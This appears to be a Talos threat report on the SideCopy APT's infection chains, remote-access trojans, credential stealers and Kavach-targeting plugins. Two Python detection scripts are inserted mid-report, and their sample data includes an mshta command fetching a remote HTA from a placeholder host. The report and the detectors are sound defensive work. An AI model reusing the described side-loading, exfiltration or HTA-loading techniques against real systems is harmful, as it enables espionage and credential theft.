# InSideCopy: How this APT continues to evolve its arsenal

### CONTENTS

- Summary
- What’s new?
- How did it work?
- So what?
- Background
  - Early infection chain
  - Latest CetaRAT infection chains
  - njRAT infections
  - MSI-based infection chain
- Malicious payloads
  - RATs
  - Plugins
- RAT analysis
  - CetaRAT
  - DetaRAT
  - ReverseRAT
  - MargulasRAT
  - Allakore
  - ActionRAT
  - Lilith
  - Epicenter RAT
- Plugin analysis
  - Files manager
  - Browser credential stealer
  - Keyloggers
  - Golang malware — Nodachi
- Tracking and delivery infrastructure
- Observations and analyses
  - Targeting
  - Credential Harvesting
- Conclusion
- Coverage

### SUMMARY

- Cisco Talos is tracking an increase in the SideCopy APT’s activities targeting government personnel in India using themes and tactics similar to APT36 (aka Mythic Leopard and Transparent Tribe).
- SideCopy is an APT group that mimics the Sidewinder APT’s infection chains to deliver their own set of malware.
- We’ve discovered multiple infection chains delivering bespoke and commodity remote access trojans (RATs) such as CetaRAT, Allakore and njRAT.
- Apart from the three known malware families utilized by SideCopy, Talos also discovered the usage of four new custom RAT families and two other commodity RATs known as “Lilith” and “Epicenter.”
- Post-infection activities by SideCopy consist of deploying a variety of plugins, ranging from file enumerators to credential stealers and keyloggers.

### WHAT’S NEW?

Cisco Talos has observed an expansion in the activity of SideCopy malware campaigns targeting entities in India. In the past, the attackers have used malicious LNK files and documents to distribute their staple C#-based RAT, which we are calling “CetaRAT.” SideCopy also relies heavily on Allakore RAT, a publicly available Delphi-based RAT. Recent activity from the group, however, signals a boost in their development operations.
Talos has discovered multiple new RAT families and plugins currently used in SideCopy infection chains. Targeting tactics and themes observed in SideCopy campaigns indicate a high degree of similarity to the Transparent Tribe APT (aka APT36), which also targets India. These include decoys posing as operational documents belonging to the military and think tanks, and honeytrap-based infections.

### HOW DID IT WORK?

SideCopy’s infection chains have remained relatively consistent with minor variations: malicious LNK files serve as entry points, followed by a convoluted infection chain involving multiple HTAs and loader DLLs to deliver the final payloads. Talos also discovered the usage of other new RATs and plugins, including DetaRAT, ReverseRAT, MargulasRAT and ActionRAT. We’ve also discovered the use of commodity RATs such as njRAT, Lilith and Epicenter by this group since as early as 2019. Successful infection of a victim results in the installation of independent plugins that serve specific purposes such as file enumeration, browser password stealing and keylogging.

### SO WHAT?

These campaigns provide insights into the adversary’s operations:

- Their preliminary infection chains involve delivering their staple RATs.
- Successful infection of a victim leads to the introduction of a variety of modular plugins.
- Development of new RAT malware indicates that this group of attackers has been rapidly evolving its malware arsenal and post-infection tools since 2019.
- Their current infrastructure setup indicates a special interest in victims in Pakistan and India.

### BACKGROUND

SideCopy campaigns use tactics and techniques that mimic the SideWinder APT group to deploy their own set of malware. For instance, this group actively utilizes artifact names and infection vectors identical to those of the Sidewinder group.
SideCopy infection chains primarily consist of archive files containing malicious LNK files delivered to the victims. The filenames are meant to social engineer the victims into opening the LNK files, in turn infecting them with SideCopy malware. What follows is a convoluted combination of malicious HTML Application (HTA) files and .NET-based loader DLLs that instrument CetaRAT and Allakore on the endpoints.

**EARLY INFECTION CHAIN**

The earliest discovered infection chain consisted of an LNK file that pulled down and executed an HTA from a remote location (Figure 1). This HTA would decode and instrument a loader DLL in memory to drop CetaRAT and another DLL (DUser.dll). The dropped DLL is side-loaded into credwiz.exe. The DLL then executes CetaRAT on the infected endpoint, thereby completing the infection chain. The actors used this method in 2019 and have evolved it since then. This primitive infection chain doesn’t include decoy documents or images and is missing the Allakore RAT component (Figure 2).

_Figure 1: LNK with fake PDF icon executing remote HTA using mshta.exe._

_Figure 2: Primitive SideCopy infection chain._

**LATEST CETARAT INFECTION CHAINS**

Beginning in 2020 and into 2021, we saw the attackers improve their infection chains. These infections also begin with malicious LNK files delivered to the victims. However, what follows is a combination of three HTA files, three loader DLLs, two instances of CetaRAT in some cases, and Allakore. This indicates an effort to modularize the attack chains, although it’s over-modularized in this case. The latest infection chains have also adopted the practice of displaying a decoy document (PDF) or image to the victims (Figure 3).

_Figure 3: Latest SideCopy infection chain._

**Stage No. 1 — LNK**

The malicious LNK contains a command (Figure 4) to run a malicious HTA file hosted on an attacker-controlled website via mshta.exe.

_Figure 4: Latest SideCopy infection chain._

**Stage No. 2 — HTA**

The malicious HTA file carries out the following activities:

- Creates a JavaScript file to restart the endpoint after the malicious HTA has completed the infection process. (The JavaScript waits for a specified time, long enough for the HTA to complete the infection, and then restarts the system.)
- Loads and invokes a malicious .NET-based loader DLL (Stage No. 2A) in memory.

**Stage No. 2A — Loader DLL**

The malicious .NET-based loader DLL is responsible for:

- Decompressing a decoy PDF and displaying it to the victim on the endpoint.
- Downloading another malicious HTA (Stage No. 3A) from a remote URL and executing it on the endpoint.
- Downloading and executing another malicious HTA file (Stage No. 4) from a remote URL.

The decoy document displayed to the victim in this case is an internal Indian Ministry of Defense (MoD) circular related to their Human Resources Management System (HRMS) (Figure 5).

_Figure 5: Decoy PDF pretending to be an internal Indian Army document._

**Stage No. 3 — Malicious HTA**

This malicious HTA is similar to those seen previously (usually seen as Stage No. 2 in other infection chains). It is used to deploy the malicious CetaRAT embedded in the HTA file. In some cases, we’ve observed instances of this malicious HTA deploying two distinct CetaRAT payloads on the same endpoint, a deviation from the usual infection chain.

**Stage No. 4 — Malicious HTA**

This malicious HTA is similar to the HTA seen in Stage No. 3A of the attack chain. This HTA also:

- Loads another loader DLL into memory (Stage No. 4A).
- Collects AV product names and passes them to the loader DLL (Stage No. 4A) along with the credwiz.exe binary and the malicious DUser.dll to be side-loaded.

**Stage No. 4A — Malicious loader DLL**

This DLL is responsible for dropping DUser.dll (Stage No. 4B, side-loaded into credwiz.exe) into a variable location, depending on the presence of specific anti-virus products installed on the endpoint:

- Kaspersky
- QuickHeal
- Avast
- Avira
- Bitdefender
- Windows Defender

This loader DLL also persists Allakore RAT on the endpoint. The side-loaded DLL is then responsible for executing Allakore.

**Stage No. 4B — Allakore**

Allakore RAT is a publicly available Delphi-based RAT. It is usually called “Cyrus client” in SideCopy infection chains. Its capabilities include:

- Upload and download files.
- Capture screenshots from the endpoint.
- Enumerate directories and files.
- Keylogging.
- Steal current clipboard data.

**NJRAT INFECTIONS**

Another recently discovered infection chain (Figure 6) used by SideCopy completely abandons CetaRAT and Allakore and uses njRAT instead. This infection chain is simpler than the ones seen previously.

_Figure 6: njRAT infection chain._

A second variation of the njRAT infection chain uses self-extracting RAR-based dropper executables that consist of:

- A malicious VB script to set up persistence for the njRAT deployed by the dropper.
- The njRAT binary dropped and executed by the dropper.
- The decoy document, usually a PDF displayed to the victim. These PDFs mainly consist of themes related to the Indian Army and government.

Some examples of the self-extracting dropper filenames:

```
Indian Army Restructring And Re-Organization.pdf.exe
director_general_level_border_coordination_conference.pdf.exe
Phase-3 of Nationwide Covid-19 Vaccination Registration.pdf.exe
```

**MSI-BASED INFECTION CHAIN**

Around mid-2020, we observed a deviation from the LNK-based infection chain. In this case, the attackers hosted a malicious archive (ZIP) on an attacker-controlled website, `freewindowssoftware[.]com`. The ZIP file contained an MSI file posing as an installer for the “Libre Video Locker” application. On installation, the malicious MSI would install Allakore RAT into the `Program Files\Libre Software Corporation\LibreVideoLocker` folder (Figure 7). The final payloads consisted of three components:

- Loader EXE: Executed first and masquerades as a Libre video player application. It is, however, meant to run Allakore and the malicious BAT file.
- Persistence BAT file: Used to set up persistence for Allakore via the registry `HKCU\..\Run` key.
- Allakore RAT exe: This is a copy of the Allakore RAT built in 2019, instrumented to communicate with a known SideCopy C2 IP.

_Figure 7: MSI-based infection chain dropping Allakore._

### MALICIOUS PAYLOADS

This is an overview of the different final stages of infections.

**RATS**

SideCopy infections utilize a number of RATs. The RAT payloads discovered by Talos so far are:

- CetaRAT: SideCopy’s staple RAT, first seen in the wild in 2019. This was already disclosed publicly. We are calling it “CetaRAT” to identify it throughout this research piece.
- DetaRAT — C#-based RAT: A previously unknown C#-based RAT that contains several RAT capabilities similar to CetaRAT.
- ReverseRAT: Another previously undiscovered C#-based reverse shell that also monitors removable drives. It is based on CetaRAT.
- MargulasRAT: This is another custom RAT used as part of SideCopy operations. The dropper for MargulasRAT masquerades as a VPN application from India’s National Informatics Centre (NIC).
- Allakore: Allakore is a Delphi-based RAT first observed in 2015. This RAT has been used by SideCopy extensively, along with CetaRAT.
- ActionRAT: ActionRAT is another Delphi-based RAT used in SideCopy’s operations.
  At first glance, it looks quite similar to Allakore but is distinct in its implementation. We also found a C#-based version of the RAT, indicating that the attackers have ported it to the .NET platform as well.
- Lilith: Lilith is a C++-based RAT first observed in 2016. SideCopy used a customized version of Lilith in early 2019. Lilith has also been utilized by another APT named “TICK” in 2018-19.
- EpicenterRAT: Epicenter is another commodity RAT observed in the wild since 2012. SideCopy’s usage of Epicenter dates back to as early as 2018-19.

**PLUGINS**

In addition to full-fledged RATs, SideCopy utilizes modular plugins to carry out specific malicious tasks on the infected endpoint:

- File manager: A file management component that can enumerate, download and upload files on the endpoint from/to the C2.
- Keyloggers: There are two keyloggers used by SideCopy.
  - Xeytan: A publicly available C#-based keylogger available since 2016.
  - Lavao: Another C#-based keylogger.
- Browser credential stealers: Again, there are two types of stealers used:
  - C-based stealer component to steal passwords from Firefox and Chrome.
  - C#-based stealer component to steal Chromium browser passwords.
- Nodachi: A previously unknown set of plugins utilized by SideCopy that we’re calling “Nodachi.” These Golang-based plugins have reconnaissance and file-stealing abilities targeting an Indian multi-factor authentication app known as “Kavach.”

### RAT ANALYSIS

**CETARAT**

CetaRAT is a C#-based RAT family first seen in the wild in 2019. Its malicious capabilities (Figure 8) include:

- Execution: Download and run arbitrary executables and commands.
- File management: Upload, download, delete, rename and enumerate files.
- Capture: Take screenshots and monitor clipboard data.
- Processes: List or kill processes on the endpoint.
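The LNK to mshta.exe to HTA to credwiz.exe/DUser.dll side-loading chain described in the Background section lends itself to straightforward endpoint detection logic. The following is an added example, not Talos tooling or any SideCopy code: it runs over constructed process-creation and image-load events (the event field names, hostnames and sample paths are assumptions) and flags mshta.exe launched with a remote URL, credwiz.exe executing outside the Windows system directories, and credwiz.exe loading DUser.dll from a user-writable path.

```python
"""Added example (not Talos tooling or SideCopy code): detection logic for two
steps of the infection chain described in this report, run over constructed
endpoint telemetry. Event field names and sample paths are assumptions."""
import re
from dataclasses import dataclass

# Legitimate credwiz.exe and DUser.dll live under the Windows system directories.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# mshta.exe handed an http(s) URL matches the Stage 1 LNK behaviour above.
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Event:
    kind: str          # "process" (creation) or "imageload" (DLL load)
    image: str         # full path of the process image
    cmdline: str = ""  # command line, process events only
    loaded: str = ""   # full path of the loaded DLL, imageload events only


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def detect(events):
    """Return (rule_name, evidence) tuples for events matching the chain."""
    findings = []
    for ev in events:
        name = _basename(ev.image)
        if ev.kind == "process":
            # Stage 1: the LNK runs a remote HTA via mshta.exe.
            if name == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
                findings.append(("mshta_remote_hta", ev.cmdline))
            # Stage 4A/4B: credwiz.exe copied to a user-writable location.
            elif name == "credwiz.exe" and not _in_system_dir(ev.image):
                findings.append(("credwiz_outside_system_dir", ev.image))
        elif ev.kind == "imageload":
            # Side-load: credwiz.exe resolving DUser.dll from a non-system path.
            if (name == "credwiz.exe" and _basename(ev.loaded) == "duser.dll"
                    and not _in_system_dir(ev.loaded)):
                findings.append(("duser_sideload", ev.loaded))
    return findings


# Constructed sample telemetry; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\mshta.exe",
          cmdline="mshta.exe https://delivery.example.invalid/circular.hta"),
    Event("process", r"C:\Windows\System32\mshta.exe",
          cmdline=r"mshta.exe C:\Program Files\Vendor\help.hta"),
    Event("process", r"C:\Users\alice\AppData\Roaming\credwiz.exe"),
    Event("imageload", r"C:\Users\alice\AppData\Roaming\credwiz.exe",
          loaded=r"C:\Users\alice\AppData\Roaming\DUser.dll"),
    Event("imageload", r"C:\Windows\System32\credwiz.exe",
          loaded=r"C:\Windows\System32\DUser.dll"),
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, evidence in run_sample():
        print(f"{rule}: {evidence}")
```

Only the first, third and fourth sample events fire: a local HTA opened with mshta.exe and the genuine credwiz.exe in System32 loading the genuine DUser.dll are left alone, which keeps the three rules usable as a low-noise starting point on real Sysmon-style telemetry.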
_Figure 8: CetaRAT command codes._

**DETARAT**

DetaRAT is a previously unknown C#-based implant used by SideCopy. This implant uses a different set of command codes (Figure 9) with a hardcoded key for communicating with its C2 servers. Its malicious capabilities include:

- File management: Create, move, rename and delete directories and files.
- File enumeration: Retrieves detailed directory and file information recursively, including creation and last access times.
- Exfiltration and infiltration: Download and upload files from and to the C2.
- Audio: Record and upload audio files.
- Remote control: Control mouse cursor and clicks.
- Hosts file: Retrieve and send the /etc/hosts file contents.
- Installed software: Exfiltrate details of installed software from the registry.
- Execution: Run arbitrary commands on the endpoint via cmd.exe.
- Clipboard: Get and set clipboard data.
- Sysinfo: The following information is sent to the C2 to fingerprint the endpoint:
  - IP and MAC addresses.
  - Installed anti-virus software.
  - Processor and GPU info, RAM info, system uptime, OS details, battery charge and life.
  - Hostname, current username and screen dimensions.

_Figure 9: DetaRAT command codes._

**REVERSERAT**

This is a simple C#-based malware that opens up a reverse shell (Figure 10) to its C2 server using cmd.exe. This reverse shell also has code built into it to monitor removable drive events (Figure 11), such as connection and removal.

**MARGULASRAT**

MargulasRAT is distributed via another C#-based dropper binary (Figure 12). The dropper masquerades as the same NIC VPN we mentioned previously. NIC is responsible for providing IT services, such as email and VPN access, to Indian government employees, including military personnel.
Another variant of the dropper deploys MargulasRAT after displaying a decoy PDF to the victim (Figure 13). This infection chain uses VBScripts to persist MargulasRAT via the registry, while the dropper downloads the RAT from a remote location (Figure 14).

MargulasRAT (Figure 15) is limited in capabilities, but does include:

- Screenshot capture: Capture a screenshot at the resolution specified by the C2, AES-encrypt it and send it.
- Update self: Receives an encoded binary from the C2, writes it to disk and executes it. Runs cmd.exe to terminate itself afterward.
- Download more payloads: Receives a name and encoded payload data from the C2, then writes it to disk and executes it on the infected endpoint.
- Stop communications: Terminate the communication session with the C2 until the next run.

We’ve observed unimplemented command codes in MargulasRAT, indicating that this RAT is actively in development by the attackers.

_Figure 10: ReverseRAT reverse shell._

_Figure 11: USB device insertion notifier code snippet._

_Figure 12: Dropper opening the decoy NIC VPN portal and setting up persistence for MargulasRAT._

_Figure 13: Code used to download and display a decoy PDF related to the Indian Army to the victim, followed by activation of MargulasRAT._

**ALLAKORE**

Allakore is a publicly available Delphi-based RAT that has consistently been used in SideCopy operations along with CetaRAT. Malicious capabilities of Allakore include:

- Keylogging.
- Capture screenshots.
- List folders and files.
- Upload/download files.
- Steal clipboard data.
- Grab/change wallpaper.

In recent infections, this RAT is named “Cyrus client” (Figure 16).

**ACTIONRAT**

ActionRAT is a Delphi-based RAT containing a limited set of capabilities. This RAT also comes in a C# variant, indicating that the attackers have ported it to the .NET platform.
This RAT typically uses two C2 URLs (Figure 17): one for the initial check-in to confirm infections (the beacon C2 URL) and the other to instrument the RAT and send/receive commands and output data.

_Figure 14: Malicious VBScript used to persist MargulasRAT across reboots._

_Figure 15: Command handler of MargulasRAT._

_Figure 16: Allakore RAT with the name “Cyrus_Client.”_

_Figure 17: Two C2 URLs used in ActionRAT._

Primary capabilities of the RAT include (Figures 18 and 19):

- Gather sysinfo: Collect the following information from the infected endpoint and send it to the C2 at the beginning of the RAT’s execution:
  - Computer name and username.
  - Installed anti-virus product names.
  - Operating system name, MAC address (used as the infection identifier) and architecture type (x86 or x64).
- Arbitrary command execution: Run arbitrary commands specified by the C2 on the endpoint.
- List drives: Collect drive names and total size for all drives present on the system and send them to the C2.
- Enumerate files: Enumerate files for a given directory on the endpoint and send the following information to the C2:
  - Directory names and creation time.
  - File path, size and creation time.
- Download files: Download a file specified by the C2 to a location on disk.
- Download and execute: Download and then execute a file specified by the C2 on the endpoint.
- Upload files: Exfiltrate the contents of a specified file to the C2.

**LILITH**

Lilith is a commodity RAT available in the wild since 2016. The version of Lilith used in SideCopy operations consists of the following capabilities (Figure 20):

- Terminate or restart self.
- Download and execute files from specified locations.
- Enumerate files.
- Reverse shell.
_Figure 18: Command codes included in the Delphi version of ActionRAT._

_Figure 19: C#-based ActionRAT’s command handler._

_Figure 20: Command codes and handlers in Lilith._

_Figure 21: Epicenter command handler._

**EPICENTER RAT**

Epicenter is a commodity RAT used by SideCopy since 2018. It contains a variety of capabilities (Figure 21) including:

- Gathering system information.
- Gather installed antivirus product names.
- Shutdown, reboot system or log the user off.
- Block keyboard and mouse inputs to self.
- Uninstall self.
- Enumerate, launch and kill processes.
- Take screenshots.
- Enumerate directories, delete files and folders.
- Check persistence status for self.

### PLUGIN ANALYSIS

**FILES MANAGER**

The files manager plugin can scan all drives on the system recursively and record file paths to a log file named “YYYYMMDDHHMMSS_di_output.txt” based on the current time (Figure 22). The file paths recorded must match the following extensions:

```
doc, ppt, xls, txt, pdf, zip, mdb, accdb, db, rar, jpg, bmp, gif, csv, bmp, docx, pptx, xlsx and png.
```

The files manager will also send preliminary system information to the C2 and receive a command code in return:

```
hname=&uname=&osname=&hid=&mcc=&avname=&arc=
```

Where:

- hname = computer name.
- uname = username of the currently logged-in user.
- osname = Windows version name string.
- hid = hardware ID, i.e. a combination of processor ID, serial number and disk signature.
- mcc = MAC address of the endpoint.
- avname = either “Defender”, “Avira” or “N/A”, depending on which AV is found installed.
- arc = “x64” or “x86”.

**Command codes:**

- “filelist” and “updatefilelist”: Send recorded file paths from “YYYYMMDDHHMMSS_di_output.txt” to the C2 server.
- “download|”: Read the contents of the file path specified by the C2 and exfiltrate them.
- “upload|”: Get the specified file from the C2 and write it to the specified location on disk.
- “execute|”: Download a specific file to a location on disk specified by the C2 and execute it.

_Figure 22: Files manager command handler module._

SideCopy also uses a document copier (Figure 23). This component searches for files with specific extensions across removable and fixed drives and creates an encrypted copy for itself. The encrypted copy may be exfiltrated later by another component. So far, this component only searches for doc, docx, ppt, pptx and pdf files.

We’ve also found standalone implementations of the document copier (called “UPirate”). This consists of document copying and encryption capabilities without the C2 functionality of the file manager component.

**BROWSER CREDENTIAL STEALER**

We’ve observed two flavors of browser credential stealer components utilized by SideCopy (Figure 24). The first is a C-based stealer that targets Firefox and Chrome.
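The files manager plugin’s check-in format, command codes and output log name described in the Files manager section are precise enough to turn into parsing and detection logic. The following is an added example, not the plugin’s own code or Talos tooling: it recognises the seven-key check-in body in the documented key order, classifies C2 replies by the plugin action they trigger, and matches the timestamped log name and the recorded extensions. The proxy log format, hostnames, hardware ID and other field values are constructed.

```python
"""Added example (not the plugin's code or Talos tooling): parse the files
manager plugin's C2 check-in, classify its command codes and recognise its
output log name. Log format, hostnames and field values are constructed."""
import re
from urllib.parse import unquote

# The seven check-in keys in the fixed order the report documents.
CHECKIN_KEYS = ("hname", "uname", "osname", "hid", "mcc", "avname", "arc")
# Extensions the plugin records, as listed in the report.
TARGET_EXTS = frozenset(
    "doc ppt xls txt pdf zip mdb accdb db rar jpg bmp gif csv docx pptx xlsx png".split())
# Log file named after the current time: YYYYMMDDHHMMSS_di_output.txt
LOG_NAME = re.compile(r"^\d{14}_di_output\.txt$")
# Bare commands and pipe-prefixed commands (argument follows the pipe).
COMMAND_ACTIONS = {
    "filelist": "send_recorded_paths",
    "updatefilelist": "send_recorded_paths",
    "download|": "exfiltrate_file",
    "upload|": "write_file_from_c2",
    "execute|": "write_and_execute",
}


def parse_checkin(body):
    """Return the check-in fields as a dict, or None if body is not one.

    Key order is part of the signature: the same keys in another order do
    not match, which keeps generic key=value bodies from firing."""
    pairs = [p.split("=", 1) for p in body.split("&")]
    if any(len(p) != 2 for p in pairs):
        return None
    if tuple(k for k, _ in pairs) != CHECKIN_KEYS:
        return None
    return {k: unquote(v) for k, v in pairs}


def classify_command(cmd):
    """Map a C2 reply to the plugin action it triggers, or None if unknown."""
    if cmd in ("filelist", "updatefilelist"):
        return COMMAND_ACTIONS[cmd]
    for prefix in ("download|", "upload|", "execute|"):
        if cmd.startswith(prefix):
            return COMMAND_ACTIONS[prefix]
    return None


def is_output_log(filename):
    return bool(LOG_NAME.match(filename))


def is_targeted_file(path):
    """True if the plugin would record this path (extension match, case-insensitive)."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    return "." in name and name.rsplit(".", 1)[-1].lower() in TARGET_EXTS


# Constructed proxy log lines: "<client-ip> <method> <url> <post-body-or-dash>"
SAMPLE_LOG = [
    "10.0.0.5 POST http://c2.example.invalid/gate.php "
    "hname=WS01&uname=alice&osname=Windows%2010&hid=CONSTRUCTED-HWID"
    "&mcc=00-11-22-33-44-55&avname=Defender&arc=x64",
    "10.0.0.7 GET http://intranet.example.invalid/index.html -",
    "10.0.0.9 POST http://c2.example.invalid/gate.php uname=bob&hname=WS02",
]


def scan_log(lines):
    """Return (client_ip, url, hname, avname, arc) for each check-in found."""
    hits = []
    for line in lines:
        ip, _method, url, body = line.split(" ", 3)
        fields = parse_checkin(body)
        if fields is not None:
            hits.append((ip, url, fields["hname"], fields["avname"], fields["arc"]))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("files manager check-in:", hit)
```

Only the first sample line is reported; the third line carries two of the same keys in a different order and is deliberately ignored, since the fixed key sequence is the part of the beacon worth alerting on. The `is_output_log` and `is_targeted_file` helpers cover the host side: a 14-digit timestamped `_di_output.txt` being created, or a burst of reads across exactly the documented extensions, is the on-disk footprint of the same plugin.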
The second credential stealer is C#-based and targets Chromium-based browsers, including:

- Chrome
- AVG Browser
- Kinza
- URBrowser
- AVAST Software
- SalamWeb
- CCleaner
- Opera
- Yandex
- Slimjet
- 360 Browser
- Comodo Dragon
- CoolNovo
- Chromium | SRWare Iron Browser
- Torch Browser
- Brave Browser
- Iridium Browser
- Opera Neon
- 7Star
- Amigo
- Blisk
- CentBrowser
- Chedot
- CocCoc
- Elements Browser
- Epic Privacy Browser
- Kometa
- Orbitum
- Sputnik
- uCozMedia
- Vivaldi
- Sleipnir 6
- Citrio
- Coowon
- Liebao Browser
- QIP Surf
- Edge Chromium

_Figure 23: Find and save an encrypted copy of files with the specified extensions._

_Figure 24: C-based browser credential stealer code for obtaining Chrome login data._

Credentials extracted from any of these browsers installed on the endpoint are then written to a temporary log file on disk and subsequently exfiltrated to a DropBox location (Figure 25).

_Figure 25: Credentials exfiltrated using the DropBox upload API._

**KEYLOGGERS**

SideCopy uses two dedicated keyloggers for recording keystrokes: the aforementioned Xeytan (Figure 26) and Lavao (Figure 27), a custom keylogger first seen around mid-2019 that records timestamps, window names and pressed key codes into a log file.

_Figure 26: Xeytan keystroke recorder used in SideCopy ops._

_Figure 27: Lavao keylogger collecting keystrokes and window titles._

**GOLANG MALWARE — NODACHI**

Cisco Talos also discovered a GoLang-based component we’re calling “Nodachi.” Nodachi is meant for reconnaissance and stealing different types of data from the victim’s endpoint:

- Credential stealing: The malware uses the goLazagne library to steal login credentials from the infected endpoint, such as those stored by internet browsers, credential managers and some sysadmin tools (Figure 28). Once the login credentials are obtained, it copies these files over to the attacker’s Google Drive.
- Steal ‘Kavach’ data: Kavach (Hindi for “Armor”) is an authentication system used by the Government of India’s (GoI) NIC agency. Kavach provides its users with an MFA application/client used to authenticate employees accessing GoI’s IT infrastructure, such as email. The malware looks for the “kavach.db” database containing users’ login credentials in the directory `C:\Users\\ AppData\Roaming\kavach.db`. If found, the file is copied to the attacker’s Google Drive (Figure 29).
- File lister: The GoLang malware uses the goLazagne library to list all files with specific extensions on the endpoint: .docx, .doc, .pptx, .xls and .xml. The files found are logged into a file that is then exfiltrated, again via Google Drive APIs, to the attackers.

One variant of Nodachi also displayed a decoy PDF downloaded from an attacker-owned Google Drive link. This decoy document is the same as the one seen in one of the latest CetaRAT infection chains (Figure 30).

_Figure 28: Credential stealer functionality._

_Figure 29: Look for kavach.db and open it._

_Figure 30: The same decoy document from CetaRAT infection chains is downloaded and displayed by Nodachi. Uploaded to Google Drive on March 25, 2021._

### TRACKING AND DELIVERY INFRASTRUCTURE

SideCopy’s delivery infrastructure consists of either setting up fake websites or using compromised websites to deliver malicious artifacts to specific victims. The delivery scripts verify that requests to receive artifacts/payloads come from two specific geographies, India and Pakistan (Figure 31). If this matches, a payload or decoy is served to the requester.

_Figure 31: Country check before serving a specific payload to the requester._
All requests are logged to a log file on the delivery server to keep track of artifacts served to potential victims (Figure 32). _Figure 32: Victim logging_ _capability of delivery servers._ The data recorded in the log files consists of the following requester information: ###### • Source IP address. • Device type: tablet, mobile or computer. • Operating system name. • User-Agent string. • Architecture type: 32- or 64-bit. • Browser name. • Referrer value. • Timestamp of request. • City and country of origin. ----- ## S deCopy How this APT continues to evolve its arsenal ### OBSERVATIONS AND ANALYSES **TARGETING** SideCopy uses themes predominantly designed to target military personnel in the Indian subcontinent. Many of the LNK files and decoy documents used in their attacks pose as internal, operational documents of the Indian Army. One infection posed as a seniority list of the Indian Army as recently as early 2021 (Figure 33). Apart from military themes, SideCopy also utilized publications, calls for papers/proposals and job openings related to think tanks in India to target potential victims. In one of the infections, the attackers used a malicious LNK file to deliver Allakore and CetaRAT to its victims. This specific attack chain used a decoy document posing as an advertisement of a call for proposals for the Chair of Excellence 2021 for the Centre For Land and Warfare Studies (CLAWS) in India (Figure 34). Interestingly, the same theme was seen in another recent attack conducted by the Transparent Tribe APT to deliver ObliqueRAT payloads to their victims. In another instance, we observed the attackers using a decoy document consisting of an article published by the Centre for Joint Warfare Studies (CENJOWS) in India. The article is a Geo Strategic Scan from August 2020 discussing the political and economic implications of resuming diplomatic talks between the U.S. and China (Figure 34). 
_Figure 33: Decoy document related to the Indian Army._

_Figure 34: Decoy document masquerading as a legitimate CENJOWS article._

More recently, an issue brief of the Observer Research Foundation (ORF, another independent think tank based out of India) was used as a decoy by SideCopy in an attack delivering njRAT to its victims (Figure 35).

Another attack from 2020 shows targeting of diplomatic personnel — those working in embassies specifically. The decoy document employed in this case consisted of a circular from the Indian Ministry of External Affairs (MEA) to its employees and attachés. This infection chain also delivered Allakore and CetaRAT (Figure 36).

Besides all of these email campaigns we’ve outlined, SideCopy also uses honeytraps to lure victims in. These infections typically consist of malicious LNK files that display explicit photos of women. The infection chain again delivers CetaRAT and Allakore. We’ve also observed APT36 (Transparent Tribe) use these types of honeytraps extensively in campaigns targeting members of India’s military with CrimsonRAT.

Also like APT36, SideCopy clones legitimate websites that actually just serve malicious content. In the case of SideCopy, we discovered afghannewsnetwork[.]com, a website posing as the Pajhwok Afghan News, an Afghan independent news agency (Figure 37). This website was used as a C2 for ActionRAT, delivered using malicious LNKs that used decoy documents that looked like professional resumes - another targeting tactic closely resembling APT36 (Transparent Tribe).

_Figure 35: ORF decoy document used in njRAT infections._

_Figure 36: Ministry of External Affairs Circular decoy document._

_Figure 37: (Left) malicious cloned website vs. (Right) legitimate website for the Pajhwok Afghan News._

**CREDENTIAL HARVESTING**

One of SideCopy’s central motives is credential harvesting. Specifically, the group looks to steal access credentials from central Indian government employees. The group commonly targets Kavach, an MFA app used across India’s government. Kavach allows employees (including military personnel) to access IT resources such as email services. SideCopy has shown a particular interest in Kavach, deploying the njRAT malware with special victim IDs of “kavach.” They also use GoLang-based file recon plugins (Nodachi) to exfiltrate Kavach authentication databases from infected devices. Some droppers for MargulasRAT also masqueraded as installers for Kavach on Windows. We’ve also discovered phishing portals operated by SideCopy posing as the GoI’s webmail to trick victims into divulging their email credentials (Figure 38).

_Figure 38: Phishing portal for webmail[.]gov[.]in set up by SideCopy._

### CONCLUSION

What started as a simple infection vector by SideCopy to deliver a custom RAT (CetaRAT) has evolved into multiple variants of infection chains delivering several RATs. The use of these many infection techniques — ranging from LNK files to self-extracting RAR EXEs and MSI-based installers — is an indication that the actor is aggressively working to infect their victims. This threat actor is also rapidly evolving their malware set using a combination of custom and commodity RATs and plugins. The variety of post-infection plugins specifically used by the attacker signifies a focus on espionage.

Targeting tactics used by SideCopy consist of multiple themes, quite similar to those utilized by APT36: military, diplomatic and honeytraps. This indicates that the group continues to target government entities in the Indian subcontinent. This boost in SideCopy’s operations, aided by multiple infection chains, RATs and plugins, marks the group’s intent to rapidly evolve their TTPs.

### COVERAGE

Ways our customers can detect and block this threat are listed below.

**Product**

- Cisco Secure Endpoint (AMP for Endpoints)
- Cloudlock
- Cisco Secure Email
- Cisco Secure Firewall/Secure IPS (Network Security)
- Cisco Secure Network Analytics (Stealthwatch)
- Cisco Secure Cloud Analytics (Stealthwatch Cloud)
- Cisco Secure Malware Analytics (Threat Grid)
- Umbrella
- Cisco Secure Web Appliance (Web Security Appliance)

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

